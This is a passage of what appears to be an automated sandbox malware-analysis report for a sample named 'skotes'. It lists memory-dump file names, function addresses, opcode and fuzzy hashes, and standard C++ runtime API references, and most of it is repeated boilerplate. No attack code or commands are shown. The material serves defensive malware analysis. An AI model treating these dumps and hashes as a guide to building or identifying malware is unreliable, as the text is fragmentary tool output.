Associated: 00000006.00000002.2975930946.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976189209.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976880868.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977217260.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977562118.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977779299.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977998863.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978168524.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978390609.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: DeleteHelperInternalScheduler$Base::Concurrency::details::EventListSafeTrace
String ID:
API String ID: 893951542-0
Opcode ID: 56d816e47c90b6a6b70af19c3cf3128c94d9de3ca414680988a4e32cd0a14922
Instruction ID: 82fc567e59131776098c36f5a5c3861cdd2d13ad9c7806fc7889f335d5100f18
Opcode Fuzzy Hash: 56d816e47c90b6a6b70af19c3cf3128c94d9de3ca414680988a4e32cd0a14922
Instruction Fuzzy Hash: 9B312436B01610DFDF159F60CC81BADB7AAAFC9710F194279E90A9B395DF30AD058B90

Function 00962CFC Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 00962D0F

Memory Dump Source

Source File: 00000006.00000002.2960262313.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000006.00000002.2959959469.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2960262313.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963225351.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963895265.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2964785557.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966475323.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966741111.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967559238.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967788512.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967968423.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968262430.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968402647.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968707394.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2969551208.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970023802.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970506072.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970863169.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971131605.0000000000B63000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971393726.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971653636.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971851409.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972152564.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972407654.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972592296.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972777856.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972998935.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973179747.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973392344.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973608752.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973780405.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974000799.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974168686.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974364643.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974575970.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974786379.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974992299.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975203667.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975337697.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975539261.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975712668.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975930946.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976189209.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976880868.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977217260.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977562118.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977779299.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977998863.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978168524.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978390609.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: BuffersConcurrency::details::InitializeManager::Resource
String ID:
API String ID: 3433162309-0
Opcode ID: abe866527e9ad0dff2bceb8308bb3be4312fd6dc48980e1561a0134800769242
Instruction ID: 5b98e8db3994e518c1a35c2873b3d479b704caf88c26a26174ff88d79c767fa8
Opcode Fuzzy Hash: abe866527e9ad0dff2bceb8308bb3be4312fd6dc48980e1561a0134800769242
Instruction Fuzzy Hash: C6314775A00709DFCF10DF94C8D0BAEBBB9BF84354F1404AAE945AB386D731A945DBA0

Function 009713F5 Relevance: 6.1, APIs: 4, Instructions: 99COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 009713FC
Concurrency::details::_TaskCollectionBase::_GetTokenState.LIBCONCRT ref: 00971447
Concurrency::details::_CancellationTokenState::_RegisterCallback.LIBCONCRT ref: 0097147A
Concurrency::details::_StructuredTaskCollection::_CountUp.LIBCMT ref: 0097152A

Memory Dump Source

Source File: 00000006.00000002.2960262313.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000006.00000002.2959959469.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2960262313.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963225351.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963895265.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2964785557.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966475323.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966741111.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967559238.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967788512.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967968423.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968262430.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968402647.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968707394.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2969551208.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970023802.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970506072.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970863169.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971131605.0000000000B63000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971393726.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971653636.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971851409.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972152564.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972407654.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972592296.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972777856.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972998935.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973179747.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973392344.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973608752.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973780405.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974000799.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974168686.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974364643.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974575970.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974786379.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974992299.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975203667.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975337697.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975539261.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975712668.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975930946.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976189209.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976880868.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977217260.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977562118.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977779299.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977998863.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978168524.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978390609.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::_$TaskToken$Base::_CallbackCancellationCollectionCollection::_CountH_prolog3_catchRegisterStateState::_Structured
String ID:
API String ID: 2092016602-0
Opcode ID: 3d7fa7b4fe9863704aef1a37bfc3f84850f79faafc00f333fa21f14748fdf841
Instruction ID: e928e7ae66373619ed5a706742d74a6ad3a48a9a197fe520460ccfa030a438b8
Opcode Fuzzy Hash: 3d7fa7b4fe9863704aef1a37bfc3f84850f79faafc00f333fa21f14748fdf841
Instruction Fuzzy Hash: F8315472E006159FCF14DFA9C491AEDFBB5BF88710B14822DE429E7391DB34A941CB90

Function 0095BB72 Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 0095BBCA
__Xtime_diff_to_millis2.LIBCPMT ref: 0095BBE4
_xtime_get.LIBCPMT ref: 0095BC07
__Xtime_diff_to_millis2.LIBCPMT ref: 0095BC13

Memory Dump Source

Source File: 00000006.00000002.2960262313.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000006.00000002.2959959469.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2960262313.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963225351.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963895265.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2964785557.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966475323.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966741111.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967559238.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967788512.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967968423.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968262430.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968402647.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968707394.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2969551208.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970023802.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970506072.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970863169.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971131605.0000000000B63000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971393726.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971653636.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971851409.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972152564.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972407654.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972592296.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972777856.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972998935.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973179747.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973392344.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973608752.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973780405.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974000799.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974168686.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974364643.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974575970.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974786379.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974992299.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975203667.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975337697.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975539261.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975712668.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975930946.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976189209.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976880868.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977217260.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977562118.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977779299.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977998863.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978168524.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978390609.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: 67091ba3a43bf9a7d588eac261f2df8d20bc0bd5184da166b79394992e8c6d46
Instruction ID: a4d71d05d3e12cae4f0cac9860085e9e1e5c752bbe8618d145e928219d794e50
Opcode Fuzzy Hash: 67091ba3a43bf9a7d588eac261f2df8d20bc0bd5184da166b79394992e8c6d46
Instruction Fuzzy Hash: DE2162B1A00219AFDF00EFA9DC85ABEB7B9EF48711F100055FD01B7251DB74AD059BA0

Function 00969C95 Relevance: 6.1, APIs: 4, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00969C9C
Concurrency::SchedulerPolicy::_ValidPolicyValue.LIBCONCRT ref: 00969CE8
std::bad_exception::bad_exception.LIBCMT ref: 00969CFE
std::bad_exception::bad_exception.LIBCMT ref: 00969D6A

Memory Dump Source

Source File: 00000006.00000002.2960262313.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000006.00000002.2959959469.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2960262313.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963225351.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963895265.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2964785557.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966475323.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966741111.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967559238.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967788512.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967968423.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968262430.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968402647.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968707394.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2969551208.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970023802.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970506072.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970863169.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971131605.0000000000B63000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971393726.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971653636.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971851409.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972152564.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972407654.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972592296.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972777856.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972998935.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973179747.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973392344.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973608752.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973780405.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974000799.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974168686.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974364643.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974575970.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974786379.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974992299.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975203667.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975337697.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975539261.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975712668.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975930946.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976189209.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976880868.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977217260.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977562118.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977779299.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977998863.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978168524.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978390609.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: std::bad_exception::bad_exception$Concurrency::H_prolog3_catchPolicyPolicy::_SchedulerValidValue
String ID:
API String ID: 2033596534-0
Opcode ID: 8a4935cd97754a4093c1cd763d326c928d3dc26ec97ce4afe69a857424a08002
Instruction ID: f6a03745e7b9ef318f4abafd11924befcf8f35711d12e5b43be483197c481101
Opcode Fuzzy Hash: 8a4935cd97754a4093c1cd763d326c928d3dc26ec97ce4afe69a857424a08002
Instruction Fuzzy Hash: 8A21F532901604EFDB05EFA8D892EADB7F8EF45314B204039F005AF2A1DB316E05CB50

Function 0096A026 Relevance: 6.1, APIs: 4, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulerProxy::IncrementFixedCoreCount.LIBCONCRT ref: 0096A069

Part of subcall function 0096B560: Concurrency::details::SchedulerProxy::ToggleBorrowedState.LIBCONCRT ref: 0096B5AF

Concurrency::details::HardwareAffinity::HardwareAffinity.LIBCMT ref: 0096A07F
Concurrency::details::SchedulerProxy::AddExecutionResource.LIBCONCRT ref: 0096A0CB

Part of subcall function 0096AB41: List.LIBCONCRT ref: 0096AB77

Concurrency::details::ExecutionResource::SetAsCurrent.LIBCMT ref: 0096A0DB

Memory Dump Source

Source File: 00000006.00000002.2960262313.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000006.00000002.2959959469.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2960262313.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963225351.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963895265.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2964785557.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966475323.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966741111.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967559238.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
